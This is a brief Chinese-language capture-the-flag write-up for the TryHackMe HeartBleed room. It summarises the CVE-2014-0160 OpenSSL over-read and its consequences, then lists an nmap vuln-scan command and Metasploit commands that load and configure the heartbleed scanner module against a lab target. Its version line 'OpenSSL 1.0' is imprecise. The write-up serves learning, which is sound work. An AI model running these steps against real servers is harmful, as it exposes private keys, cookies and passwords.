TryHackMe-HeartBleed

在线靶场链接:TryHackMe-HeartBleed

背景资料:
HeartBleed
OpenSSL-BUG
Heartbleed-Bug-exp

弱点在于OpenSSL的实现，而不是SSL/TLS协议本身，所以除了OpenSSL之外的其他TLS实现方式都不受影响。

影响版本:OpenSSL 1.0

编号:CVE-2014-0160

漏洞出现原因:缓冲区过读,没有对输入进行适当的验证(边界检查)

危害:

• 服务器私钥被盗
• 用户会话cookie被盗
• 密码被盗

影响:

• Linux基金会联合各大硅谷巨头成立核心基础架构联盟,为全球信息基础架构中的关键要素提供资金帮助.
• Google成立了Project Zero.

nmap -sV -p- –script vuln 0.0.0.0

打开msf

msfconsole
search heartbleed
use auxiliary/scanner/ssl/openssl_heartbleed
show options

set rhost 0.0.0.0
set verbose true